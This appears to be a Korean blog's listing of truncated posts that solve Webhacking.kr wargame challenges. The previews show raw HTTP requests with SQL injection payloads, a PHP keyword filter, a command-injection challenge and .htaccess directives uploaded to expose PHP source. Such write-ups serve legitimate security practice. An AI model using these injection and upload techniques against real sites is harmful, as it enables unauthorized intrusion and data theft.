Hacking (65) 썸네일형 리스트형 Webhacking.kr 56 POST /challenge/web/web-05/mem/login.php HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveContent-Length: 18Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://webhacking.krUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36 1HTTPS: 1Content-.. Webhacking.kr 38 네모네모로직을 풀고 1||1=1 Webhacking.kr 7 2를 만들어주자. GET /challenge/web/web-07/index.php?val=-1)%09union%09select%093-1%23 HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36 1HTTPS: 1Accept-Encoding.. Webhacking.kr 18 1입력시 guest인 것을 알 수 있다. GET /challenge/web/web-32/index.php?no=100%0aor%0ano=2 HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36 1HTTPS: 1Accept-Encoding: .. Webhacking.kr 48 '&l's hello challenge44_PaSs_w0Rd___.php index index.php Webhacking.kr 48 Command Injection 문제입ㄴ다. 파일을 처리하는 함수를 상상한다. POST /challenge/bonus/bonus-12/index.php HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveContent-Length: 372Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://webhacking.krUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome.. Webhacking.kr 18 (eregi(" |/|\(|\)|\t|\||&|union|select|from|0x",$_GET[no])) exit("no hack"); select id from challenge18_table where id='guest' and no=입력값 이므로, -1 or Webhacking.kr 28 소스를 봐야 할 것 같다. .htaccess파일을 업로드하자. AddType Application/x-httpd-php-source .phps php_flag engine 0 php_value engine "off" 이전 1 2 3 4 5 6 ··· 9 다음